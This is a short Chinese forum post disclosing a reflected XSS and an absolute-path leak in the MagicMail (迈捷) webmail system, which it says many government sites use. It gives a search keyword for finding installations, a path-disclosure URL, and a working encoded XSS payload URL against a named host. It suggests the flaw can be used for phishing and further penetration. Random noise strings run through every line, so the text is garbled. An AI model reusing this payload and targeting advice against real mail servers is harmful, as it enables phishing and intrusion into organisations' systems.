今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞# e/ g0 z3 X# H c
4 a6 t# v9 l# W* c' K
' p7 d6 W2 V6 m: Z: a' _包含 一个反射性XSS 以及 绝对路径泄漏 p& y% f* E m. z! w: N/ d" T
看了看 貌似全部是linux的。5 i( k& ?1 D* P/ Y) ~
$ n7 [/ B' v+ g' n, Q5 U
关键字:迈捷邮件系统 by MagicMail
: p' @1 E. O4 S+ P! p/ `7 `
) `* A! {1 h8 |7 Q可以看到很多政府网站都用这个邮件系统
8 w( e1 D; Y1 y$ P4 q9 H/ i4 ~& l+ M: U: a& i0 U
绝对路径 http://madman.in/index.php?login_type=declare&language=7 n0 L" t: j% A$ O, T
: K) v. ]1 L3 }. X
& }$ B2 j- g( d) F5 W& @3 Q" c) z& F
$ }5 E) {8 F s( C9 T- \7 k
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E2 e4 a/ Y# w# G$ ?/ D3 Y5 I
5 l4 x% W" G& E9 H
- _+ C; _$ M; \7 i- j! k/ u p6 H$ x' C$ n1 n
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
) c \5 N7 a/ D5 v : f1 e; r8 X3 N: {9 o# M: j
修复方案:看官方补丁吧。 i+ i% N" \* ^2 V: V" ~% V! R' k
|